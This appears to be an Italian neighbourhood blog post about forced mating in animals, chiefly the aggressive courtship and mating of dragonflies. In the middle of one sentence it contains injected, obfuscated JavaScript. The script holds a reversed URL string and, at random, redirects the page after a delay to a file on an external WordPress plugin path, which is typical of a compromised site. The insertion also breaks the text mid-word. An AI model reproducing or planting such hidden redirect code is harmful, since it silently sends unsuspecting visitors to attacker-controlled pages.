Animali che lo fanno… violento

image_pdfimage_print

Quest’estate le cronache sono state spesso occupate da notizie di violenze sessuali compiute nei confronti di donne. Anche a Firenze.
In questi casi molti tirano fuori il luogo comune che ‘l’uomo è peggio delle bestie’.
E se proprio io che amo gli animali vi dicessi che questo è un mito in parte da sfatare?
Infatti anche tra gli animali talvolta capita di assistere a dei veri e propri stupri. Ed anche alle Piagge, se osserviamo bene alcuni animali che abitano il quartiere possiamo verificare ciò…
Prendiamo un animale del tutto… ‘insospettabile’: la libellula.
Tutti noi almeno una volta pass (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando vicino ad un laghetto ci siamo fermati meravigliati ad osservare le evoluzioni acrobatiche di questi piccoli e variopinti insetti, che per la loro capacità di volare in verticale sembra abbiano ispirato gli inventori degli elicotteri.
Ebbene, nonostante il loro aspetto grazioso ed innocuo in realtà le libellule sono dei veri ‘killer degli stagni’!
Ed i maschi sono molto aggressivi nei confronti delle femmine quando decidono che devono accoppiarsi: infatti nella loro ‘frenesia d’amore’ i maschi delle libellule letteralmente assalgono le femmine, afferrandole per la ‘nuca’ magari mentre loro sono tranquille a prendere il sole su una foglia…
Spesso così si accendono delle vere e proprie zuffe che possono anche portare alla morte di uno od entrambi gli ‘amanti’…
Ma a parte questa fase violenta (dovuta forse al fatto che le libellule adulte hanno solo pochi mesi per riprodursi…), l’accoppiamento delle libellule è uno degli spettacoli più singolari che la natura ci offre (gratis!), degno dei migliori contorsionisti circensi. Infatti il maschio e la femmina per unire i loro organi genitali devono piegare i loro lunghi corpi ed il maschio afferra la compagna dietro la testa. Le due libellule a questo punto formano una sorta di ‘cuore’ e rimangono così unite anche a lungo rimanendo ferme oppure anche volando. Poi, una volta compiuto l’accoppiamento, la femmina depone le uova o sulla vegetazione delle rive o direttamente in acqua.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *